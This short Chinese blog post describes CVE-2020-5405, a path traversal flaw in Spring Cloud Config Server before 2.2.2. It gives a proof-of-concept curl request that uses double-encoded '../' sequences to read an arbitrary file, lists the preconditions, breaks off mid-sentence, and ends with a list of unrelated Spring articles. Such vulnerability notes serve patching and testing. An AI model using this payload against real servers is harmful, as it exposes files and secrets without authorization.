spring框架漏洞整理(Spring Cloud Config路径穿越导致的信息泄露)
2023-09-11 14:19:27 时间
CVE-2020-5405 Spring Cloud Config路径穿越导致的信息泄露。
此spring框架漏洞影响版本:spring-cloud-config-server < 2.2.2
https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/65bbd0ec4f2fd012318f7d91548ba1f338d5e064/Spring%20Cloud/CVE-2020-5405%20Spring%20Cloud%20Config%20%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/README.md
poc:
Spring Cloud Config路径穿越导致的信息泄露利用点1:
curl http://127.0.0.1:9988/foo/profiles/%252f..%252f..%252f..%252fUsers%252fxuanyonghao%252ftmp/aaa.xxx
读取 /User/xuanyonghao/tmp/aaa.xxx 文件
foo 对应 {application}
profiles 对应 {profiles}
%252f..%252f..%252f..%252fUsers%252fxuanyonghao%252ftmp 对应 {label}
todo 条件限制:
todo 1. 文件必须有后缀,也就是类似 .txt 等等。
todo 2. cloud: config: server: native: search-locations: file:///tmp/{label},此处的目录需要有{application}或{profiles}或{label}&#x
相关文章
- Spring之Bean的作用域与生命周期
- 【Spring Boot】Spring Boot之两种引入spring boot maven依赖的方式
- spring 学习3-Spring AOP
- Spring 知识点提炼-转
- [Spring学习笔记 3 ] spring 注解详解,完全注解,常用注解
- JavaSE、JavaEE与Spring的概念和异同点剖析
- Spring Boot:定制servlet filters
- Atitit spring单元测试 注解 获取服务名 Spring文件单独放在一个文件夹,去掉dubbo配置,方便测试 里面包含的mybatis 找不到,只好设置成相对于class绝对路径可以了
- Spring多数据源分布式事务管理/springmvc+spring+atomikos[jta]+druid+mybatis
- spring boot + spring security +前后端分离【跨域】配置 + ajax的json传输数据
- Java学习路线-60:spring 整合 mybatis
- 005-spring cache-原理、缓存AOP机制、Spring Cache抽象集成机制、springboot自动配置机制
- 005-spring-data-elasticsearch 3.0.0.0使用【三】-spring-data之Spring数据扩展
- 009-Spring Boot 事件监听、监听器配置与方式、spring、Spring boot内置事件
- Spring jdbcTemplat 写入BLOB数据为空
- Spring JDBC更新数据
- spring事务bug
- Spring通知类型及使用ProxyFactoryBean创建AOP代理